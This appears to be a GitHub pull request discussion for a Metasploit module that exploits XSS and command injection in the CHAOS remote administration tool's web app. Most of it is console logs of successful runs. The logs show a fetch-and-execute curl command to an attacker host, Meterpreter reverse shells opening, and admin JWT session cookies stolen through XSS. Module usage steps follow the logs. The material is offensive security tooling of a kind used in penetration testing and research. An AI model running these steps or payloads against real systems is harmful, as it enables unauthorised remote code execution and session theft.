Open h00die opened 4 weeks ago
@chebuya wanted to bring this to your attention since you discovered it
Tested and seems to be working as intended 👍
Happy to land once the rest of the feedback is resolved.
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
[*] Command to run on remote host: curl -so ./oYcqobeBZTuJ http://<ip>:9090/Odyz7kVKF-TYi8-49qC08A; chmod +x ./oYcqobeBZTuJ; ./oYcqobeBZTuJ &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /Odyz7kVKF-TYi8-49qC08A
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through direct login
[*] Attempting login
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:47768) at 2024-05-08 10:23:11 +0100
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
[*] Command to run on remote host: curl -so ./IyktmtoLxSkl http://<ip>:9090/7PTrmgXiZtm7zaMXvFhTIQ; chmod +x ./IyktmtoLxSkl; ./IyktmtoLxSkl &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /7PTrmgXiZtm7zaMXvFhTIQ
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through Agent
[*] Server address: 172.17.0.2
[*] Server port: 8080
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4
[*] Fake MAC for agent: b5:51:a0:d9:ee:f1
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4
[+] Detected Agents
Live Agents
===========
IP OS Username Hostname MAC
-- -- -------- -------- ---
<ip> Windows Administrator (Administrator) DC01 b5:51:a0:d9:ee:f1
[*] Client <ip> requested /7PTrmgXiZtm7zaMXvFhTIQ
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:61669) at 2024-05-08 11:32:31 +0100
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through JWT token
[*] Fake MAC for agent: fe:9a:14:40:91:66
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjg1MDgsIm9yaWdfaWF0IjoxNzE1MTY0OTA4LCJ1c2VyIjoiYWRtaW4ifQ.8MjwkzGcIT0QatzRf6kMLMihBTdKyFQb1mrzGfJj9Ho
[+] Detected Agents
Live Agents
===========
IP OS Username Hostname MAC
-- -- -------- -------- ---
<ip> Windows Administrator (Administrator) DC01 a8:ae:8a:9e:e0:11
<ip> Windows Administrator (Administrator) DC01 fe:9a:14:40:91:66
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 2 opened (<ip>:4444 -> <ip>:33236) at 2024-05-08 11:46:05 +0100
CHAOS v5.0.8 is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems. The webapp contains a remote command execution vulnerability which can be triggered by an authenticated user when generating a new executable. The webapp also contains an XSS vulnerability within the view of a returned command being executed on an agent.
Execution can happen through one of three routes:
JWT
token from an agent can be provided to emulate a compromised host. If a logged in user attempts to execute a command on the host the returned value contains an xss payload.JWT
token can be extracted.Verified against CHAOS
7d5b20ad7e58e5b525abdcb3a12514b88e87cef2
running in a docker container.Verification
use exploit/linux/http/chaos_rat_xss_to_rce
set rhost [ip]
set username [username]
,set password [password]
set jwt [jwt token]
set agent [path to agent]
run